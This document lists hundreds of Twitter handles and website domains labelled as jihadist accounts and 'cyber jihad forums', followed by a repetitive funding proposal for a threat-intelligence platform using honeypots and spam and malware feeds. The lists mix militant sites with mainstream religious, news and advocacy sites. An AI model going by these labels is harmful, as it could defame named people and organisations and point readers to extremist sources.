• https://twitter.com/ibn _dyala93

• https://twitter.com/jxcjcj1

• https://twitter.com/mosalma1991

• https://twitter.com/rfvb7

• https://twitter.com/alaser100

• https://twitter.com/asd4000hd

• https://twitter.com/AbdAllahGaza

• https://twitter.com/MhdSayf

• https://twitter.com/aqaq1qa

• https://twitter.com/mhunc1231

• https://twitter.com/azdyisis55

• https://twitter.com/Baghdad9191

• https://twitter.com/74gh1

• https://twitter.com/nnbb77881

• https://twitter.com/a _t _ _29 _ _7a

• https://twitter.com/Kh _nsa143

• https://twitter.com/theykillmybro

• https://twitter.com/210Birdy

• https://twitter.com/daish90

• https://twitter.com/A _ _ _A _c

• https://twitter.com/soman611

• https://twitter.com/qwerwoow

• https://twitter.com/fojraqqa

• https://twitter.com/saegr2

• https://twitter.com/ezzislamm

• https://twitter.com/ach3ari _maliki

• https://twitter.com/Ansar5433
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• https://twitter.com/waja _ _1

• https://twitter.com/Islamic _3344

• https://twitter.com/Oj7jl (doe

• https://twitter.com/zeses2

• https://twitter.com/abu _a _89

• https://twitter.com/medad _med1

• https://twitter.com/block _151

• https://twitter.com/Alkurdi1995

• https://twitter.com/haydra2233

• https://twitter.com/Asirat _Tunisia1

• https://twitter.com/Rouba56

• https://twitter.com/KA _ll7

• https://twitter.com/bwwwg

• https://twitter.com/aljabri354

• https://twitter.com/msaks241

• https://twitter.com/wffff11089

• https://twitter.com/Djjjdjd4

• https://twitter.com/parisINHELL

• https://twitter.com/IllI32lIIl

• https://twitter.com/Daaeem51

• https://twitter.com/malekaty891

• https://twitter.com/mouwa7ed _03

• https://twitter.com/sunnahth1000

• https://twitter.com/R _nxxt _1

• https://twitter.com/qq _qq _79

• https://twitter.com/rkrk4m25

• https://twitter.com/OT _lll57

• https://twitter.com/Migrant2Allah

• https://twitter.com/adgr19

• https://twitter.com/Njd _ _zz77zz

• https://twitter.com/Hhgff26176827
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• https://twitter.com/OOUltra00

• https://twitter.com/rkrk4m25

• https://twitter.com/rkrk4m26,

• https://twitter.com/rkrk4m27

• https://twitter.com/rkrk4m28

• https://twitter.com/rkrk4m29

• https://twitter.com/rkrk4m30

• https://twitter.com/rkrk4m31

• https://twitter.com/rkrk4m32

• https://twitter.com/kaj _ _s

• https://twitter.com/ABu _AlAyInaa

• https://twitter.com/ABO _SLEMAN _9

• https://twitter.com/d _mf33

• https://twitter.com/Turbo _zahid

• https://twitter.com/ww _cvf

• https://twitter.com/IlTllillTIl

• https://twitter.com/CF _G66

• https://twitter.com/abu _juuad

• https://twitter.com/isis _2277

• https://twitter.com/Asd15Wreg

• https://twitter.com/abcdfghjkl12

• https://twitter.com/71AprVISHV18VIP

• https://twitter.com/Ha23ra3F987

• https://twitter.com/UiU _o _UiU

• https://twitter.com/isuwh

• https://twitter.com/III _ _Heart

• https://twitter.com/Sabaa760

• https://twitter.com/zajell8

• https://twitter.com/clockwise75

• https://twitter.com/jxcjcj1

• https://twitter.com/gjdfoi221qw
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• https://twitter.com/smjh2154

• https://twitter.com/Aymanjrjr2

• https://twitter.com/khatabb66

• https://twitter.com/sor _hall

• https://twitter.com/isis _1188

• https://twitter.com/allmah89

• https://twitter.com/j3x _w8p

• https://twitter.com/om _ans102

• https://twitter.com/mfaw18

• https://twitter.com/dfgvdffcxx

• https://twitter.com/ississ _is

• https://twitter.com/DrAlnefisi

• https://twitter.com/Abovaseer34

• https://twitter.com/zeydusame5

• https://twitter.com/KH50380

• https://twitter.com/dskvnsflk/

• https://twitter.com/Cano65525269

• https://twitter.com/AL _adnani _69

• https://twitter.com/isnacon0020

• https://twitter.com/lvj7165d

• https://twitter.com/zeses2

• https://twitter.com/asloly _ _ _ _ _Ws5

• https://twitter.com/alansari32MMOMM

• https://twitter.com/hajed114

• https://twitter.com/aboalhsn1111

• https://twitter.com/paris _pigs

• https://twitter.com/ibn _abdiqany

• https://twitter.com/zzzassertty233

• https://twitter.com/Bbdbd8

• https://twitter.com/mozamjaer _16

• https://twitter.com/TNT7mslm7

152

• https://twitter.com/isis _7744

• https://twitter.com/ayshafalaste2

• https://twitter.com/d _m11a

• https://twitter.com/Dhhd4874

• https://twitter.com/Dr _MagedMohamad

• https://twitter.com/omar14373

• https://twitter.com/cyberkhilafa05

• https://twitter.com/IlIl32IlIl

• https://twitter.com/Dhhd4874

• https://twitter.com/akhy01

• https://twitter.com/jahezona13

• https://twitter.com/71AprVISHV18VIP
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• https://twitter.com/dfghujuiytrr

• https://twitter.com/mejedklm

• https://twitter.com/f73071755

• https://twitter.com/rkrk4m26

• https://twitter.com/dyalla72

• https://twitter.com/sa7awetbuslim04

• https://twitter.com/TP57iQ3lCAGgKzV

• https://twitter.com/mohammedsz6

• https://twitter.com/1993Agmad1993

• https://twitter.com/Bbsswwnn

• https://twitter.com/almnasron4

• https://twitter.com/bar _bel1

• https://twitter.com/ManguAilon55

• https://twitter.com/modie _50

• https://twitter.com/Njd _ _ _qt78is

• https://twitter.com/Gehaaad1122

• https://twitter.com/bladi _00alaslam

• https://twitter.com/fallujha1

• https://twitter.com/AboFareed10

• https://twitter.com/manerland

• https://twitter.com/abo _a _94

• https://twitter.com/3Abouwalid

• https://twitter.com/bakreebeeko _5

• https://twitter.com/3li1187

• https://twitter.com/Alnablsy97
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• https://twitter.com/G6A77

• https://twitter.com/TheObserver91

• https://twitter.com/6cccg2

• https://twitter.com/ISIS _HERO1

• https://twitter.com/ZZzBXqHOymuBANK

• https://twitter.com/teamsystemdz

• https://twitter.com/vbhgxdfc

• https://twitter.com/bhCotn

• https://twitter.com/maktaba _1

• https://twitter.com/osama _dam1

• https://twitter.com/fata _almosel

• https://twitter.com/xxmm4455777

• https://twitter.com/abujalaall

• https://twitter.com/Waseemalsaudi

• https://twitter.com/Khlifa27a12

• https://twitter.com/AbidaGina

• https://twitter.com/Ansar _Dawla10

• https://twitter.com/yesteyesic4

• https://twitter.com/lieffejongen

• https://twitter.com/MohammedAtta22

• https://twitter.com/Ticaal90

• https://twitter.com/AliAdenalSomali

• https://twitter.com/ns45678

• https://twitter.com/AbouShahadeh

• https://twitter.com/jihadi10744139

• https://twitter.com/abohamzaalturki

• https://twitter.com/JoniManm

• https://twitter.com/omar1985741

• https://twitter.com/see00012

• https://twitter.com/almuhajerBackup

• https://twitter.com/sadking23
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• https://twitter.com/qwttpIIy

• https://twitter.com/k42isisa

• https://twitter.com/dhxhsvd2

• https://twitter.com/77nb _

• https://twitter.com/dawlajokers

• https://twitter.com/monaser0017

• https://twitter.com/dawlawialg671

• https://twitter.com/fahadeyad62

• https://twitter.com/btr333btr4

• https://twitter.com/vrjevve1

• https://twitter.com/Hhdhdg1

• https://twitter.com/GF98LKI

• https://twitter.com/dola24687

• https://twitter.com/Talal _Q3O

• https://twitter.com/muslimmouwahed8

• https://twitter.com/8itismesalman

• https://twitter.com/kubuiman03v

• https://twitter.com/jihadiuser58

• https://twitter.com/PARRIS _951

• https://twitter.com/isis _1144

• https://twitter.com/SyariahISlight8

• https://twitter.com/meek _don

• https://twitter.com/yotorg

• https://twitter.com/facebookaccoun2

• https://twitter.com/nseem066

• https://twitter.com/AnsarAd98

• https://twitter.com/ieshabaqea

• https://twitter.com/batist550

• https://twitter.com/aassddffa833

• https://twitter.com/madridi4good

• https://twitter.com/nor92331

191

• https://twitter.com/1ElNusra1

• https://twitter.com/j _jj _jjj _5577

• https://twitter.com/strange566

• https://twitter.com/gp2126

• https://twitter.com/pp62068813

• https://twitter.com/ _ _ _ _ _ _ _ _ _N _ _ _34

• https://twitter.com/Uddjdn1

• https://twitter.com/kathebw11

• https://twitter.com/bbgg75157900

• https://twitter.com/Rama15202

• https://twitter.com/ _J _I _T _E _M _

• https://twitter.com/mohamed _zainab4

• https://twitter.com/ChicbnmAbn

• https://twitter.com/Tr8 _K0

• https://twitter.com/eng _ _sr

• https://twitter.com/gjjkjtogfffdr

• https://twitter.com/Om _khatabb

• https://twitter.com/ubj _k

• https://twitter.com/KhilafahDawah5

• https://twitter.com/AbuDharIslandi7

• https://twitter.com/ixcncn1

• https://twitter.com/anaeldora30

• https://twitter.com/mazenhapne

• https://twitter.com/qwtpIIry

• https://twitter.com/Dabiiq7

• https://twitter.com/A05462492

• https://twitter.com/Hmode5556Www

• https://twitter.com/3MlagDO1

• https://twitter.com/meditato

• https://twitter.com/ukhtiaisha1

• https://twitter.com/abcd123456789a7
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• https://twitter.com/abou _amina37

• https://twitter.com/AmonMame

• https://twitter.com/Oo800Oo8001

• https://twitter.com/Abu _Bin _Fartin

• https://twitter.com/marsds98zahrany

• https://twitter.com/ _ihsen _086 _

• https://twitter.com/33Khilafa

• https://twitter.com/gajhfjfd

• https://twitter.com/Obayd6Wevrw

• https://twitter.com/0o00ooq

• https://twitter.com/e30isisa

• https://twitter.com/41invasion

• https://twitter.com/OpIS75

• https://twitter.com/K _H _O34

• https://twitter.com/h90 _6

• https://twitter.com/know _paris

• https://twitter.com/saeu17

• https://twitter.com/anjemchoudary

• https://twitter.com/tnt502tnt502

• https://twitter.com/AbuFullaan9th

• https://twitter.com/gmailco69426226

• https://twitter.com/Owais _51

• https://twitter.com/mohamed20607

• https://twitter.com/med _syr _ira91

• https://twitter.com/muslim _libi

• https://twitter.com/muahied _7

• https://twitter.com/qqeqq00111

• https://twitter.com/ahmed14377

• https://twitter.com/aabuyosif

• https://twitter.com/vip444662

• https://twitter.com/saeu17
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• https://twitter.com/dgsdg00712420

• https://twitter.com/kabugezo

• https://twitter.com/AbuIslamIS1990

• https://twitter.com/mafel _65

• https://twitter.com/AbuHafsaBritani

• https://twitter.com/Ahmadkhalf2012

• https://twitter.com/YourOwnBro116

• https://twitter.com/Reporters000

• https://twitter.com/TurMedia318/

• https://twitter.com/GermanyUnderAtk

• https://twitter.com/WakeUp _MV

• https://twitter.com/saeu17

• https://twitter.com/Bushra11 _IS

• https://twitter.com/TurMedia318

• https://twitter.com/jabalybaraa

• https://twitter.com/s _2O17 _

• https://twitter.com/frm450

• https://twitter.com/gogoaag82

• https://twitter.com/xxx _ _800

• https://twitter.com/pe0jnv39mvnf

• https://twitter.com/IslamArmy01

• https://twitter.com/g8670062 _8

• https://twitter.com/yyf _hallo

• https://twitter.com/e1AFX9kbARBByHv

• https://twitter.com/lba559721

• https://twitter.com/del _elremah1

• https://twitter.com/isisom61

• https://twitter.com/Idififkk1

• https://twitter.com/makdici1970

• https://twitter.com/mahsud117

• https://twitter.com/K _A _S _E _R _5
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• https://twitter.com/lmaqdese

• https://twitter.com/nour _umm

• https://twitter.com/5aq5qDGpNsr4IDU

• https://twitter.com/AbdMouwahid

• https://twitter.com/gaza9310

• https://twitter.com/Jfdlbk

• https://twitter.com/Elkhelafa _Now

• https://twitter.com/jazaer12254477

• https://twitter.com/IssamSayari

• https://twitter.com/Abo _mhdi29

• https://twitter.com/moedker01

• https://twitter.com/hafeed1001

• https://twitter.com/Yamani _5

• https://twitter.com/alsumoud17

• https://twitter.com/nbn1000

• https://twitter.com/khilafahinfos

• https://twitter.com/teagouch1

• https://twitter.com/aaallaaallaaa _ _

• https://twitter.com/ondayiwillkilly

• https://twitter.com/DjibrilParisi

• https://twitter.com/aawwss _22

• https://twitter.com/Dolawiyah _Jo6

• https://twitter.com/gfd6064

• https://twitter.com/ansaar132

• https://twitter.com/drwaleed5253

• https://twitter.com/ajnad55

• https://twitter.com/inbes3

• https://twitter.com/asaudicowdonkey

• https://twitter.com/zxzx321zxzx

• https://twitter.com/UmmAbdallah89

• https://twitter.com/arabhty
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• https://twitter.com/Asirat _hramin19

• https://twitter.com/EhliSunneti3

• https://twitter.com/salilbnim

• https://twitter.com/Saifjazraawi

• https://twitter.com/ab1o3zam12

• https://twitter.com/frost0023

• https://twitter.com/uiopup

• https://twitter.com/Kassar _Iam

• https://twitter.com/gmccccc10

• https://twitter.com/drherhdfbdrhdhs

• https://twitter.com/kinght78ag

• https://twitter.com/JUI _LJ

• https://twitter.com/snipern433

• https://twitter.com/Ffhfbfb1

• https://twitter.com/Almohajer _103

• https://twitter.com/oummoudjahid

• https://twitter.com/ahmadsaid91

Detailed Project Funding Stages Information

The initial stage of the project will consist of selective and timely purchase of all the necessary appliances in-

cluding the timely localization and successful acquisition of fake Web sites honeypot solutions including the active

acquisition of network assets for the purpose of successfully honeypot solution placement.

• The main objective of the initial phase would be to acquire all the necessary equipment for the purpose of

setting up the foundations for the Obmonix platform. The equipment will be acquired in a timely fashion largely

relying on a selected set of proprietary industry leading set of contacts.

• The main objective of the next phrase would be to ensure that the equipment is placed in a secure location

and is properly maintained for the purpose of ensuring that the operator is capable of operating the Obmonix

platform in a secure way.

• The main objective of the next phase would be to establish the foundations of the world’s largest data set of in-

telligence data for the purpose of ensuring that the Obmonix platform is capable of processing and intercepting

the necessary data.

• The main objective of the next phase would be to acquire the necessary proprietary service based solutions

that would empower the operator with the necessary tools to process and intercept data.
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• The main objective of the next phase would be to process and intercept the world’s largest data set of cybercrime and cyber jihad data.

Sample Cyber Jihad Forums:

• http://rion2005.100free.com

• http://2s2s.com

• http://abo-ali.com

• http://Aboalqaqa.blogspot.com

• http://aboaumir.modawanati.com

• http://abomoath.ahlablog.com

• http://abomosab-s.110mb.com

• http://abu-hadi.net

• http://abu-qatada.com

• http://abubaraa.co.uk

• http://abujibriel.com

• http://aekhlaas.com

• http://aekhlaas.net

• http://ahlu-tawheed.com

• http://al3aren.com/vb/index.php

• http://al3wda.com/vb/index.php

• http://al-amanh.net

• http://al-ansar.net

• http://al-boraq.info

• http://al-boraq.org

• http://al-busyro1.info

• http://al-busyro.info

• http://al-ekhlaas.net

• http://al-ekhlaas.net/forum

• http://al-ekhlaas.org

• http://al-faloja.com

• http://al-faloja.info/vb/index.php
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• http://al-farooq.net

• http://al-jahafal.com/vb

• http://al-kafkaz.com

• http://al-mustaqbal.net

• http://al-nour.net

• http://al-ommh.net

• http://al-qimmah.net

• http://al-rashedeen.info

• http://al-tamkeen.com

• http://al-yemen.org

• http://alahed.org

• http://alamer.biz/ameer/home.html

• http://alanbar.topgoo.net

• http://alanssar.net

• http://alaseb.com

• http://albasrah.net/index.php

• http://albawaba.com

• http://albayan.co.uk

• http://albayanislamac.com

• http://albetaqa.com

• http://alboraq.info

• http://Alboraq.info/forum

• http://alboraqforum.info

• http://albtar.1talk.net/index.htm

• http://albusyro.info

• http://albuxoriy.com

• http://alekhlaas.com

• http://alekhlaas.info

• http://alekhlaas.net

• http://alekhlaas.org

• http://alemara1.org
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• http://alemarah.org

• http://alfajrtaqni.net

• http://alfetn.com

• http://alfetn.com

• http://alfida.jeeran.com

• http://alfidaa.biz

• http://alfidaa.info/vb

• http://alfidaa.org/vb

• http://alforqan.ingoo.us

• http://Alforqan.ingoo.us

• http://alfurq4n.org

• http://algyshalmnsur.r8.org

• http://AlHanein.com

• http://AlHesbah.net

• http://AlHesbah.org

• http://alifati.wordpress.com

• http://alintiqad.com

• http://aljazeeratalk.net/forum/

• http://aljazeeratalk.net/portal

• http://alkhelafa.eu

• http://allah4ever.hi5.com

• http://almaqdese.net

• http://almaqreze.net

• http://almaqreze.net/ar

• http://almedad.com/vb

• http://almnbr.net/vb

• http://almob2.com

• http://almobshrat.net

• http://almokhtsar.com

• http://almqdes.net

• http://almubarakradio.com
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• http://Alnakshabandia-army.com

• http://alnakshabandia-army.org/home

• http://Alneda.com

• http://Alnour.hyperphp.com

• http://alnour.hyperphp.com/vb

• http://Alnusra.net

• http://alnusrra.net

• http://alokab.com

• http://alokab.com/forums/lofiversion

• http://alqassam.ps

• http://alqoqaz.net

• http://alquds.co.uk

• http://alrafdean.org

• http://alraiah.net

• http://Alsaha.com

• http://alshahid.org

• http://alsomod-iea.info

• http://alsomod.com

• http://alsunnah.info

• http://Alsunnah.info

• http://altabetoun.110mb.com

• http://altarefe.com

• http://altarefe.com is

• http://altawbah.net/vb

• http://altaybeh.net

• http://alweya.com

• http://an-najah.net

• http://anashid.ru

• http://Anbaar.net

• http://anjemchoudary.co.uk

• http://ansa1.info
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• http://ansaaar.com

• http://ansar1.info

• http://ansar11.org

• http://ansar-alhaqq.net

• http://ansar-jihad.net

• http://ansar.tv

• http://Ansarnet.ws

• http://ansharulislam.com

• http://anti-majos.com

• http://antiliberalnews.com

• http://antydetroidmichigan.blog.onet.pl

• http://aqeeda2008.maktoobblog.com

• http://aqlislamiccenter.com

• http://arrahmah.com

• http://asad101.jeeran.com

• http://asaeb.net

• http://asaebweb.com

• http://asd813.maktoobblog.com

• http://atahadii.com/vb

• http://Azzam.com

• http://azzammedia.com

• http://azzammedia.net

• http://bab-ul-islam.net

• http://baghdadsniper.net

• http://bintjbeil.com

• http://bumisyam.com

• http://cageprisoners.com

• http://cageuk.org

• http://chechensinsyria.com

• http://ClearGuidance.com

• http://clearinghous.infovlad.net
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• http://cyberkov.com

• http://czeczenia.blog.onet.pl

• http://d-sunnah.net

• http://dakwahmedia.net

• http://darelhadi.com

• http://Darelhadi.com

• http://daruhilafe.com

• http://darultavhid.com

• http://daulahislamiyah.net

• http://daulahislamiyyah.com

• http://dawaalhaq.com

• http://dawatehaq.net

• http://dawla-is.cf

• http://dd-sunnah.net/forum/index.php

• http://dhiqar.net

• http://dinhaqq.info

• http://doguturkistanbulteni.com

• http://dr-algzouli.com

• http://dr-mahmoud.com

• http://drbj.net

• http://duniaterkini.com

• http://dwl-is.appspot.com

• http://dyou1991.maktoobblog.com

• http://e-kl-s.info

• http://e-kl-s.net

• http://egysite.com/al2nsar

• http://ek-ls.org

• http://ekhlaas.biz

• http://ekhlaas.cc

• http://Ekhlaas.cc

• http://ekhlaas.com
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• http://ekhlaas.info

• http://ekhlaas.net

• http://ekhlaas.org

• http://ekhlaas.ws

• http://el-tewhid.com

• http://eldorar.com

• http://elmanara.org

• http://Elshouraa.ws/vb

• http://eltwhed.110mb.com

• http://eltwhed.110mb.com/homepage.htm

• http://enfalmedya.com

• http://eramuslim.com

• http://eraqeidawlh.maktoobblog.com

• http://f2008h.maktoobblog.com

• http://falestiny.net

• http://falloja.blogspot.com

• http://farouqomar.net

• http://fatehforums.com

• http://fidaa1.net/vb

• http://fisyria.info

• http://forum.hawaaworld.com

• http://forum.saraya.ps

• http://forums.ikhwan.net/t

• http://forums.naseej.com

• http://fpi.or.id

• http://fursan-al-iraq.over-blog.com

• http://g-elshmal.com/vb/index.php

• http://generalvekalat.org

• http://ghaaly.com

• http://ghaliboun.net

• http://gimfmedia.com/tech
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• http://gulf-up.com

• http://gurmad.info

• http://h-alali.net

• http://halabnews.com

• http://halifat.info

• http://halifat.org

• http://hamas.ps

• http://hamasaliraq.com

• http://hamasiraq.org

• http://hanein.info

• http://hanein.info/

• http://hanein.info/vb

• http://hanein.info/vb/forum.php

• http://harb-net.com/vb

• http://harunyahya.com

• http://health1.maktoobblog.com

• http://hewar.khayma.com

• http://heyetnet.org

• http://hidayatullah.com

• http://hizb-afghanistan.com

• http://hizb-america.org

• http://hizb-australia.org

• http://hizb-eastafrica.com

• http://hizb-pakistan.com

• http://hizb-russia.info

• http://hizb-turkiston.net

• http://hizb-turkiye.org

• http://hizb-ut-tahrir-almaghreb.info

• http://hizb-ut-tahrir.dk

• http://hizb-ut-tahrir.info

• http://hizb-ut-tahrir.org
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• http://hizb-ut-tahrir.se

• http://hizb-uzbekistan.info

• http://hizb.org.ua

• http://hizb.org.uk

• http://Hizbollah.org

• http://hizbollah.tv

• http://Hizbollah.tv

• http://hizbut-tahrir.or.id

• http://hizbuttahrir.info

• http://hizbuttahrir.org

• http://ht-afghanistan.org

• http://ht-bangladesh.info

• http://ht-tunisie.info

• http://htmedia.info

• http://alboraqmedia.org

• http://alekhlaas.cc

• http://alweehdat.com/vb

• http://Hussamaldin.jeeran.com

• http://iaisite-eng.org

• http://iaisite.biz

• http://Iaisite.info

• http://iaisite.info

• http://iaisite.info/index.php

• http://iaisite.net

• http://iaisite.org

• http://iczkeria.blog.onet.pl

• http://ikhwan.net

• http://imamtv.com

• http://imamtv.com/

• http://infovlad.net/mirror _alansar _alsunnah

• http://invitetoislam.com
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• http://invitetoislam.org

• http://iraq-war.ru

• http://Iraqiasaeb.org

• http://iraqipa.net

• http://iraqirabita.org.uk

• http://iraqiyoon.com

• http://Iraqpatrol.com

• http://iraqpatrol.com

• http://iraqpatrol.com/php

• http://isdarat-tube.com

• http://isdarat.org

• http://isdarat.tv

• http://isecur1ty.com

• http://islahhaber.net

• http://islam-iea.com

• http://islamdaveti.com

• http://islamdevleti.info

• http://islamdevleti.org

• http://islamdevleti.org/

• http://islamdin.com

• http://islamdin.net

• http://islamic-dw.com

• http://islamic-f.net/vb

• http://Islamic-f.net/vb

• http://islamic-state.ga

• http://islamic-state.media

• http://islamicawakening.com

• http://islamicdigest.net

• http://islamiciraq.maktoobblog.com

• http://IslamicIraq.modawanati.com

• http://islamiciraq.modawanati.com
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• http://islamicstate.media

• http://islamicstate.pro

• http://islamicsupremecouncil.org

• http://islammemo.cc

• http://islampos.com

• http://islamqa.info

• http://islamway.com

• http://isnews.net

• http://j-aliraq.net

• http://jaami.info

• http://jaber-m-b.maktoobblog.com

• http://jaber-mb.maktoobblog.com

• http://jabhtnosra.appspot.com





• http://jaishabibaker.net

• http://JaishabiBaker.net

• http://jamaatshariat.com/ru

• http://jamahirl.ps

• http://jamatdawa.com

• http://jamatdawa.org

• http://jannatoshiqlari.net

• http://jehadway.7olm.org

• http://jihadmin.com

• http://jnoub.org

• http://JondurRahmaan.com

• http://jsc-web.net/vb

• http://kabardeyonline.org/tr/index _tr.htm

• http://kafilahmujahid.com

• http://kafkaz.maktoobblog.com

• http://Kataeb-20.org

• http://kataeb-20.org/main

• http://kataibaqssa.com/forum/index.php
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• http://kataibaqssa.com/newarab

• http://kavkaz.org.uk

• http://kavkaz.tv

• http://kavkazcenter.com

• http://kavkazcenter.info

• http://kavkazcenter.net

• http://kavkazchat.com

• http://kavkazjihad.com

• http://khabarpana.com

• http://khaleelstyle.com

• http://khelafa.org

• http://khilafa.org

• http://khilafah-archives.com

• http://khilafah.com

• http://khilafah.net

• http://khilafat.dk

• http://kiblat.net

• http://kirkuk.kalamfikalam.com

• http://kokludegisim.net

• http://ktb-20.com

• http://Kwaflislam.com

• http://kwaflislam.com/vb/index.php

• http://ladn.maktoobblog.com

• http://lakii.com

• http://land-alsham.com

• http://lasdipo.com

• http://liputan-kita.com

• http://m3ark.com

• http://mail.ek-ls.org

• http://Majahd.quickbb.net

• http://majahd.quickbb.net/index.htm
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• http://majahden.com

• http://majelismujahidi.com

• http://majles.alukah.net

• http://maktoobblog.com

• http://manbar.me

• http://maqrezeradio.net

• http://marsad.net

• http://mediaislam.ucoz.ru

• http://medicine2001.maktoobblog.com

• http://mhesne.com

• http://mitv.moy.su

• http://mnbr.info

• http://mobasher.110mb.com

• http://moj-irq.com

• http://montada.yaqen.net

• http://moqavemat.com

• http://moqawama.org

• http://moqawama.tv

• http://moqawmh.com

• http://morasl.maktoobblog.com/

• http://mujahideenarmy.com

• http://muntada.sawtalummah.com

• http://muqawamah.com

• http://muslimdaily.net

• http://muslimprisoners.com

• http://muslimuzbekistan.net

• http://muslm.net

• http://muslm.net/vb

• http://muslm.org

• http://muvahhid.info

• http://muwahhid.info
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• http://muwahideen.co.nr

• http://myhesbah.net

• http://mykhilafah.com

• http://mymy.my-goo.net/index.htm

• http://nahimunkar.com

• http://nasrollah.org

• http://Nasrunmiallah.net

• http://nepras.ps

• http://news.stcom.net

• http://News.stcom.net

• http://nkusa.org

• http://nmayd.com

• http://nmayd.com/

• http://nuruddin.4bb.ru

• http://nusraah.com

• http://old.kavkazcenter.com

• http://omar-abdrahman.110mb.com

• http://pal-is.net/vb

• http://paldf.net

• http://paldf.net/forum

• http://palestine-info.com

• http://palestinegallery.com

• http://palestinianforum.net

• http://palir.net

• http://panjimas.com

• http://pda.kavkaz.tv

• http://profetensummah.com

• http://qassam-rockets.skyrock.com

• http://qassam-rockets.skyrock.com

• http://qassam.ps

• http://qudsnews.net
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• http://qyemen.com

• http://radioalfurqaan.com

• http://radioalfurqaan.com is

• http://radioandalus24.com

• http://radyotevhid.com

• http://ramaadi.1talk.net/index.htm

• http://rawadalmaly.com/vb

• http://reformandjihadfront.org

• http://revolution.muslimpad.com

• http://rjfront.info

• http://rjfront.org

• http://Rmadi.top-me.com

• http://saadarmy.com

• http://saaid.net

• http://sadcom.montadamoslim.com

• http://salaf-us-saalih.com

• http://Salafia.balder.prohosting.com

• http://salafiah.com

• http://salafimediauk.com

• http://salam-online.com

• http://samirkuntar.org

• http://saraya.ps

• http://Sarayaalquds.org

• http://sarayaalquds.org

• http://Sarayasaad.com

• http://sarayasaad.com

• http://save-islam.com

• http://Sawtaljihad.org

• http://sawtaljihad.org

• http://sawtalummah.com

• http://se-te.com
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• http://shabakataljahad.com

• http://shahamat-arabic.com

• http://shahamat-english.com

• http://shahamat-farsi.com

• http://shahamat-movie.com

• http://shahamat-urdu.com

• http://shamikh1.info

• http://shamilonline.org/rusnya/index _ru.htm

• http://sharia4indonesia.com

• http://Shiaweb.org

• http://shiaweb.org/hizbulla/index.html

• http://Shmo5alIslam.net

• http://shoutussalam.org

• http://skaba.ps

• http://Sobhank.com

• http://sobhank.com/vb

• http://somalimemo.net

• http://somod.org

• http://soutalhaq.net

• http://Soutweb.100free.com

• http://sqr-al3rb.com

• http://suara-islam.com

• http://sunnahcare.com

• http://sunnahonline.com

• http://suwaidan.com

• http://swalif.net

• http://syamina.com

• http://syamorganizer.com

• http://tahrir-syria.info

• http://tajdeed.org.uk

• http://takvahaber.net
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• http://tarani.info

• http://Tawhed.ws

• http://tevhiddergisi.com

• http://tevhiddersleri.com

• http://tevhididavet.com

• http://tevhidigundem.net

• http://theshamnews.com

• http://thethirdjihad.com

• http://thoriquna.com

• http://thoriquwna.com

• http://toorabora.org

• http://turkhackteam.org

• http://twelvershia.net

• http://uicforce.co.vu

• http://ummah.com

• http://ummahislam.com

• http://ummetislam.info

• http://ummetislam.net

• http://vb999.maktoobblog.com

• http://vb.fpnp.net

• http://vb.roro44.com/index.php

• http://vd.ag

• http://vdagestan.com

• http://voa-islam.com

• http://W-N-N.net

• http://Wa3ad.org

• http://wa3iarabi.com

• http://wa7at.org/vb

• http://wap.kavkaz.tv

• http://worldakhbar.com

• http://worldnet.ws
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• http://worldnet.ws/radio/index.html

• http://worldnet.ws/vb

• http://yenidenislam.com

• http://zad-muslim.com

• http://zaeer1.22web.net

• http://zaidhamid.pk

• http://zuheer17.maktoobblog.com

Detailed Project Funding Phase Information

01. The initial stage of the project will consist of selective and timely purchase of all the necessary appliances

including the timely localization and successful acquisition of fake Web sites honeypot solutions including the active

acquisition of network assets for the purpose of successfully honeypot solution placement.

• Associated deliverables will include access to proprietary technology the ability to associate long-term task

including the ability to set the foundation for the Obmonix platform including eventual commercialization of the

Obmonix platform further enhancing the operator’s ability to continue providing the Intelligence Community

with the necessary data to proactively respond to a growing set of malicious nation-state and malicious actors

type of cybercrime and cyber-jihad activity globally.

02. The next stage will consist of active placement of the required equipment in a secure location including the

placement of active secure measures in place to ensure that the Obmonix operator remains work in a secure location

including premise.

• Associated deliverables will include secure work place including the ability to empower the operator with the

necessary data to perform various operator activity ensuring global presence for Intelligence Community mem-

bers and the security industry

03. The next stage will consist of active spam phishing and malware feed access purchase including successfully

geolocated placement within specific regions of choice of interest inducing but not limited to Algeria, Argentina,

Bahrain, Bolivia, Brazil, Burkina Faso, Chile, China, Colombia, Cyprus, Ecuador, Guatemala, Jordan, Democratic

People’s Republic of Korea, Liberia, Macao, Maldives, Moldova, Republic of Nauru, Niger, Pakistan, Poland, Romania,

Sierra Leone, Sudan, Arab Republic Syrian, Togo, Uganda, Vanuatu, Yemen.

• Associated deliverables will include access to the world’s largest portfolio of threat intelligence data set including

access to real-time data successfully empowering the operator with the necessary data to perform an operator

activity.
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04. The next stage will include the active acquisition of service-based type of localization and acquisition solutions

leading to a successful set of data to be processed and collected by the sensor.

• Associated deliverables will include access to proprietary technology successfully empowering the operator

with the necessary data to perform the operator activity including real-time monitoring of the world’s largest

and most comprehensive sensor network based type of cybercrime and cyber-jihad sensor based type of plat-

form.

05. The next phase will include the active data acquisition from the Intelligence Community’s leading intelligence

gathering platform in the form of active data placement including the establishment of an active threat intelligence-

gathering portal based type of platform.

• Associated deliverable will include the world’s largest data set of cybercrime and cyber jihad activity sensor type

of platform eventually leading the Obmonix platform to reach a commercialization stage further enhancing the

Intelligence Community’s and the security industry’s mission.

Detailed Project Cost Proposal Information

The initial stage of the project will consist of selective and timely purchase of all the necessary appliances in-

cluding the timely localization and successful acquisition of fake Web sites honeypot solutions including the active

acquisition of network assets for the purpose of successfully honeypot solution placement.

• FortiMail

Key points:

• The appliance is capable of processing millions of emails on a daily basis

• The appliance is capable of maintaining a list of thousands of fake emails allowing additional attribution poten-

tially expanding the capabilities of the appliance to include additional custom made spam origin sources.

• The appliance is capable of delivering actionable intelligence on millions of spam origin sources, for Iran, Pak-

istan, Saudi Arabia, Iraq and Syria, on a daily basis

• The appliance is capable of delivering detailed information, leading, to the production of actionable intelligence,

for Iran, Pakistan, Saudi Arabia, Iraq and Syria, on a daily basis.
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The FortiMail appliance would ensure the active acquisition of spam for the purpose of establishing the foundations

for a successful research and monitoring type of research and analysis type of system allowing the systematic

real-time and automated acquisition of malicious software phishing and social engineering.

• Blue Coat Malware Analysis

Key points:

• The appliance is capable of processing thousands of malware samples, on a daily basis

• The appliance is capable of maintaining detailed information processed and delivered in an automated fashion

for malicious sources originating in Iran, Pakistan, Saudi Arabia, Iraq and Syria

• The appliance is capable of interacting with Web links found in malicious spam emails for the purpose of es-

tablishing the foundations, for successful monitoring of malicious software phishing and social engineering

